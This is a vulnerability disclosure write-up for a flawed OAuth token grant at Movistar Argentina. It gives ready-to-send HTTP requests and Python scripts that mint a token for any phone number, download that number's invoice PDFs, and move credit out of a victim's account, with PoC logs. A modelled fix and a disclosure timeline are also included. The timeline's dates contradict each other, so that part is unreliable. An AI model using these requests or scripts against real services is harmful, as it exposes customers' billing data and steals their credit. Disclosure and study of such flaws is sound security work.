Vulnerability that allows anyone to download the invoices of any phone number registered at Movistar Argentina. It was found with mitmproxy on the Android mobile app and is the result of a faulty OAuth implementation: the token endpoint issues a bearer token for whatever username is supplied, checking only the app's static client credentials and never a credential belonging to the user.

1st step: Obtain an OAuth token for the target phone number

Send the following request to https://mi.movistar.com.ar, setting the username field to the phone number whose invoices you want to download. No password or other user credential is involved: client_id and client_secret are constants embedded in the app, and the client_secret is simply the base64 encoding of "appcontainer", i.e. the client_id itself.

POST /oauth/token HTTP/1.1
Host: mi.movistar.com.ar
x-requested-with: com.services.movistar.ar
content-type: application/x-www-form-urlencoded
content-length: 91

grant_type=mobile&username=1112345678&client_id=appcontainer&client_secret=YXBwY29udGFpbmVy

The response is a JSON document containing the access_token, an HS256-signed JWT whose payload carries at least exp, user_name (an opaque encoded value rather than the plain phone number) and scope. This token is all we need to build the invoice requests. (For security and legibility, the tokens in the following examples are truncated.)

{
  "access_token": "eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE0NzE4NDcyODUsInVzZXJfbmFtZSI6Inp0MzFxWWRtQWdTNEN3PT0iLCJzY29wZSI...",
  "token_type": "bearer",
  "expires_in": ...,
  "scope": "read trust write",
  "jti": "..."
}

2nd step: Obtain a list of available periods

Each available period corresponds to an invoice we can download. Send a request to https://mi.movistar.com.ar with the access_token obtained in the previous step in the Authorization header, as follows:

GET /v1/facturacion/periodos HTTP/1.1
Host: mi.movistar.com.ar
authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE0NzE4NDk2NDQsInVzZXJfbmFtZSI6InJ3T3FjSGl6U05...
content-type: application/x-www-form-urlencoded

You will get as response a JSON document listing the available periods.

 {
  "status": 200,
  "date": "2016-08-21 ...",
  "data": [
    {
      ...
      "date": "2016-02-04",
      ...
    },
    {
      ...
      "date": "2016-03-04",
      ...
    },
    ...
  ]
}

From this document we only need the date field of each period, since it is the path component used to build the invoice URL.

3rd step: Download the invoices!

With the token and the list of periods in hand, we can download the invoices. Each one is fetched from a URL of the form:

https://mi.movistar.com.ar/v1/facturacion/(resumen|comprobante)/<periodo>/pdf/

For example, to download the comprobante for the 2016-03-04 period listed in the previous step:

GET /v1/facturacion/comprobante/2016-03-04/pdf/ HTTP/1.1
Host: mi.movistar.com.ar
authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE0NzE4NDk2NDQsInVzZXJfbmFtZSI6InJ3T3FjSGl6U05...
content-type: application/x-www-form-urlencoded

The response headers include:

Server: Apache-Coyote/1.1
Content-Type: application/pdf
...

The body of the response is the PDF of the requested invoice. Note that the server authorises the request purely on the bearer token; since that token was minted for an attacker-chosen username, any number's invoices are reachable.
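The three steps above, chained end to end, as an added example (this is not the bajar_facturas.py script from the original repository). The HTTP transport is injected so the chain runs offline against a constructed stand-in for mi.movistar.com.ar that replays the responses documented above; SAMPLE_TOKEN, fake_send and the stub PDF bodies are constructed for this example. It also shows two checks a practitioner would make on the captured traffic: decoding the static client_secret, and reading the JWT claims without a key.

```python
import base64
import json
from typing import Callable, Dict, List, Optional, Tuple

BASE = "https://mi.movistar.com.ar"

# A transport takes (method, url, headers, body) and returns
# (status, response_headers, response_body).  Injecting it keeps the chain
# testable offline; a real script would wrap requests.Session here.
Transport = Callable[[str, str, Dict[str, str], bytes],
                     Tuple[int, Dict[str, str], bytes]]


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the padding JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def client_secret_plaintext() -> bytes:
    """The static client_secret the app sends is just the client_id, base64-encoded."""
    return base64.b64decode("YXBwY29udGFpbmVy")


def jwt_claims(token: str) -> Dict[str, dict]:
    """Split a JWT into header and payload WITHOUT checking the signature
    (inspection only: the client never holds the HS256 key)."""
    header, payload, _signature = token.split(".")
    return {"header": json.loads(b64url_decode(header)),
            "payload": json.loads(b64url_decode(payload))}


def get_token(phone: str, send: Transport) -> str:
    """Step 1: grant_type=mobile needs only the target number plus the app's
    embedded client pair; no user credential is ever checked."""
    body = ("grant_type=mobile&username={}&client_id=appcontainer"
            "&client_secret=YXBwY29udGFpbmVy".format(phone)).encode()
    headers = {"x-requested-with": "com.services.movistar.ar",
               "content-type": "application/x-www-form-urlencoded",
               "content-length": str(len(body))}
    status, _, resp = send("POST", BASE + "/oauth/token", headers, body)
    if status != 200:
        raise RuntimeError("token request failed with HTTP %d" % status)
    return json.loads(resp)["access_token"]


def list_periods(token: str, send: Transport) -> List[str]:
    """Step 2: only the 'date' of each period is needed to build invoice URLs."""
    status, _, resp = send("GET", BASE + "/v1/facturacion/periodos",
                           {"authorization": "Bearer " + token}, b"")
    if status != 200:
        raise RuntimeError("period listing failed with HTTP %d" % status)
    return [period["date"] for period in json.loads(resp)["data"]]


def download_invoice(token: str, period: str, kind: str,
                     send: Transport) -> Optional[bytes]:
    """Step 3: fetch one PDF; kind is 'resumen' or 'comprobante'.  Returns None
    when the server has no document (the PoC log shows a resumen failing while
    the comprobante for the same period succeeds)."""
    url = "{}/v1/facturacion/{}/{}/pdf/".format(BASE, kind, period)
    status, hdrs, body = send("GET", url, {"authorization": "Bearer " + token}, b"")
    if status != 200 or not hdrs.get("Content-Type", "").startswith("application/pdf"):
        return None
    return body


def download_all(phone: str, send: Transport) -> Dict[str, Dict[str, bytes]]:
    """Run the whole chain and return {period: {kind: pdf_bytes}}."""
    token = get_token(phone, send)
    result: Dict[str, Dict[str, bytes]] = {}
    for period in list_periods(token, send):
        result[period] = {}
        for kind in ("resumen", "comprobante"):
            pdf = download_invoice(token, period, kind, send)
            if pdf is not None:
                result[period][kind] = pdf
    return result


# --- Constructed offline stand-in for mi.movistar.com.ar (not real data). ---
# Built from the claim names visible in the captured JWT; the signature is a dummy.
SAMPLE_TOKEN = "eyJhbGciOiJIUzI1NiJ9." + base64.urlsafe_b64encode(json.dumps(
    {"exp": 1471847285, "user_name": "zt31qYdmAgS4Cw==", "scope": "read trust write"}
).encode()).rstrip(b"=").decode() + ".c2ln"


def fake_send(method: str, url: str, headers: Dict[str, str],
              body: bytes) -> Tuple[int, Dict[str, str], bytes]:
    """Replays the behaviour documented in the writeup: any digit-only username
    gets a token; one resumen is missing to exercise the None path."""
    path = url[len(BASE):]
    if method == "POST" and path == "/oauth/token":
        form = dict(kv.split("=", 1) for kv in body.decode().split("&"))
        if form.get("grant_type") == "mobile" and form.get("username", "").isdigit():
            return 200, {}, json.dumps({"access_token": SAMPLE_TOKEN,
                                        "token_type": "bearer"}).encode()
        return 400, {}, b""
    if headers.get("authorization") != "Bearer " + SAMPLE_TOKEN:
        return 401, {}, b""
    if path == "/v1/facturacion/periodos":
        return 200, {}, json.dumps({"status": 200, "data": [
            {"date": "2016-02-04"}, {"date": "2016-03-04"}]}).encode()
    if path == "/v1/facturacion/resumen/2016-03-04/pdf/":
        return 500, {}, b""  # mirrors "Error al descargar la factura" in the PoC log
    if path.startswith("/v1/facturacion/") and path.endswith("/pdf/"):
        return 200, {"Content-Type": "application/pdf"}, b"%PDF-1.4 stub " + path.encode()
    return 404, {}, b""


if __name__ == "__main__":
    print(client_secret_plaintext(), jwt_claims(SAMPLE_TOKEN)["payload"])
    for period, docs in download_all("1112345678", fake_send).items():
        print(period, sorted(docs))
```

To run it against the live service at the time, fake_send would be replaced by a thin wrapper around requests.Session; nothing else in the chain changes, which is the point: the only attacker-controlled input in the whole flow is the phone number in step 1.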

POC

The file bajar_facturas.py contains a sample application automating this process. It downloads all available invoices for a given phone number. To run it, first install the necessary Python 3 dependencies:

$ pip install -r requirements.txt

Then run the app:

$ ./bajar_facturas.py
Ingrese el numero de telefono: 1112345678
Token: eyJhbGciOiJIUzI1NiJ9.eyJl...
Encontradas facturas para fechas :['2016-02-04', '2016-03-04', ...]
Requesting: https://mi.movistar.com.ar/v1/facturacion/resumen/2016-02-04/paginas
Requesting: https://mi.movistar.com.ar/v1/facturacion/comprobante/2016-02-04/paginas
Creating folder: .../Movistar_Exploit/1112345678/2016-02-04
Requesting: https://mi.movistar.com.ar/v1/facturacion/comprobante/2016-05-04/pdf/
Saving image to: .../Movistar_Exploit/1112345678/2016-05-04/comprobante.pdf
Requesting: https://mi.movistar.com.ar/v1/facturacion/resumen/2016-05-04/pdf/
Saving image to: .../Movistar_Exploit/1112345678/2016-05-04/resumen.pdf
Creating folder: .../Movistar_Exploit/1112345678/2016-06-04
Requesting: https://mi.movistar.com.ar/v1/facturacion/comprobante/2016-06-04/pdf/
Saving image to: .../Movistar_Exploit/1112345678/2016-06-04/comprobante.pdf
Requesting: https://mi.movistar.com.ar/v1/facturacion/resumen/2016-06-04/pdf/
Error al descargar la factura del periodo: 2016-06-04
Creating folder: .../Movistar_Exploit/1112345678/2016-07-04
Requesting: https://mi.movistar.com.ar/v1/facturacion/comprobante/2016-07-04/pdf/
Saving image to: .../Movistar_Exploit/1112345678/2016-07-04/comprobante.pdf
Requesting: https://mi.movistar.com.ar/v1/facturacion/resumen/2016-07-04/pdf/
Saving image to: .../Movistar_Exploit/1112345678/2016-07-04/resumen.pdf
Creating folder: .../Movistar_Exploit/1112345678/2016-08-04
Requesting: https://mi.movistar.com.ar/v1/facturacion/comprobante/2016-08-04/pdf/
Saving image to: .../Movistar_Exploit/1112345678/2016-08-04/comprobante.pdf
Requesting: https://mi.movistar.com.ar/v1/facturacion/resumen/2016-08-04/pdf/

UPDATE: 28/10/2016 - Credit transfer

With its latest update, the mobile app now allows credit transfers between accounts. Using the following API endpoint, an arbitrary amount of credit can be moved out of any account into any other (subject to the restrictions of the plans involved), because the source account is whichever number the bearer token was obtained for in step 1, and that token requires no credential. The PoC output below shows the path with the same /v1 prefix as the billing endpoints:

POST /v1/recarga/cargamesaldo HTTP/1.1
Host: mi.movistar.com.ar
authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE0NzE4NDk2NDQsInVzZXJfbmFtZSI6InJ3T3FjSGl6U05...
content-type: application/json

{
  "amount": <amount of credit to move>,
  "destination": <destination phone number>
}

On a successful transfer, the response body is:

{"status": 200, "date": "2016-11-07 ...", "data": {"responseCode": "000", "responseMessage": "OK"}}

The file robar_saldo.py contains a sample app automating this method: it takes any two phone numbers and an amount and executes the transfer:

$ ./robar_saldo.py
Ingrese el numero de telefono victima: 1141234567
Ingrese el numero de telefono destino: 1141234567
Ingrese el saldo a robar: 1
Token: eyJhbGciOiJIUzI1NiJ9.eyJleHAiOjE0NzkxNz...
Posting request to: https://mi.movistar.com.ar/v1/recarga/cargamesaldo
Response: {'data': {'responseMessage': 'OK', 'responseCode': '000'}, 'date': '2016-11-13 ...', 'status': 200}
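A self-contained model of why the transfer is exploitable and what the fix looks like, added here as an example; it is not Movistar's server code. The HS256 key, the user table, the balances and the rejection code "999" are constructed assumptions. The point it makes is that the JWT itself is sound (signature and expiry verify correctly on the resource side); the flaw is that the mobile grant mints a token naming any user_name after checking only the client pair shipped in the APK, so the transfer endpoint's "debit the account the token names" rule authorises the attacker. The fixed issuer keeps the same grant shape but refuses to name a user it has not authenticated.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed model data: key, user table and balances are assumptions.
HS256_KEY = b"constructed-issuer-key"
USER_SECRETS = {"1141234567": "victim-pass", "1155550000": "attacker-pass"}
BALANCES = {"1141234567": 10, "1155550000": 0}
APP_CLIENT = ("appcontainer", "YXBwY29udGFpbmVy")  # static pair shipped in the app


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64url(seg: str) -> bytes:
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))


def mint_hs256(claims: dict) -> str:
    """Issue a JWT with the same header as the captured one: {"alg":"HS256"}."""
    signing_input = _b64url(b'{"alg":"HS256"}') + "." + _b64url(
        json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(HS256_KEY, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def verify_hs256(token: str) -> dict:
    """Resource-server side: signature and expiry are checked properly.
    That is the point: the token format is fine, the issuance policy is not."""
    header, payload, sig = token.split(".")
    expected = hmac.new(HS256_KEY, (header + "." + payload).encode(),
                        hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _unb64url(sig)):
        raise PermissionError("bad signature")
    claims = json.loads(_unb64url(payload))
    if claims["exp"] < time.time():
        raise PermissionError("expired")
    return claims


def _check_client(form: dict) -> None:
    """The client pair identifies the app build, not a user; anyone with the APK has it."""
    if (form.get("client_id"), form.get("client_secret")) != APP_CLIENT:
        raise PermissionError("bad client")


def token_endpoint_vulnerable(form: dict) -> str:
    """grant_type=mobile as observed: username is trusted as supplied."""
    _check_client(form)
    return mint_hs256({"user_name": form["username"], "scope": "read trust write",
                       "exp": int(time.time()) + 3600})


def token_endpoint_fixed(form: dict) -> str:
    """Same grant, but a token naming a user is issued only after that user proves
    control of the account (a password here; an OTP to the number would do)."""
    _check_client(form)
    expected = USER_SECRETS.get(form.get("username", ""), "")
    if not expected or not hmac.compare_digest(expected, form.get("password", "")):
        raise PermissionError("bad credentials")
    return mint_hs256({"user_name": form["username"], "scope": "read trust write",
                       "exp": int(time.time()) + 3600})


def cargamesaldo(token: str, body: dict, balances: dict) -> dict:
    """Model of POST /v1/recarga/cargamesaldo: debit the account the token names,
    credit body['destination'].  Only as safe as the issuer's promise that
    user_name was actually authenticated."""
    claims = verify_hs256(token)
    src, dst, amount = claims["user_name"], body["destination"], int(body["amount"])
    if amount <= 0 or dst not in balances or balances.get(src, 0) < amount:
        return {"status": 400, "data": {"responseCode": "999",  # constructed code
                                        "responseMessage": "REJECTED"}}
    balances[src] -= amount
    balances[dst] += amount
    return {"status": 200, "data": {"responseCode": "000", "responseMessage": "OK"}}


ATTACK_FORM = {"grant_type": "mobile", "username": "1141234567",
               "client_id": "appcontainer", "client_secret": "YXBwY29udGFpbmVy"}


def steal_with_vulnerable_grant(balances: dict) -> tuple:
    """Attacker mints a token for the victim's number and moves 1 unit of credit."""
    token = token_endpoint_vulnerable(ATTACK_FORM)
    resp = cargamesaldo(token, {"amount": 1, "destination": "1155550000"}, balances)
    return resp, balances


def steal_with_fixed_grant(balances: dict) -> str:
    """Same attack against the fixed issuer: without the victim's credential, no token."""
    try:
        token_endpoint_fixed(dict(ATTACK_FORM, password="guess"))
    except PermissionError as err:
        return str(err)
    return "token issued"


if __name__ == "__main__":
    print(steal_with_vulnerable_grant(dict(BALANCES)))
    print(steal_with_fixed_grant(dict(BALANCES)))
```

The transfer endpoint is identical in both runs; only the issuer changes. That is the practical lesson for a reviewer: auditing the resource server's authorisation check in isolation would have passed it, and the bug is only visible when you ask what the token's user_name claim actually proves.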

Timeline

  • 21/08/2016: First contact with Movistar Argentina via Twitter (@movistararg).
  • 21/08/2016: Customer support says they will pass the report on to the developers of the mobile app. (The report was not forwarded.)
  • 22/08/2016: Contact via atencionalclienteonline@telefonica.com; vulnerability report sent.
  • 29/08/2016: Asked for confirmation of receipt.
  • 31/08/2016: Movistar confirms the report was received and forwarded to the responsible area, and that they are working on an update.
  • 14/10/2016: After asking about the status of the report, Movistar confirms that the vulnerability has been resolved. The GitHub repository is made public.
  • 16/10/2016: Movistar acknowledges the vulnerability, thanks us for reporting it, and assures us they are working on a fix.

Screenshots

  • First contact (22 August)
  • Reply (22 August)
  • Update request (29 August)
  • Reply (31 August)
  • New update request (14 November)
  • Reply informing that it is resolved (14 November)
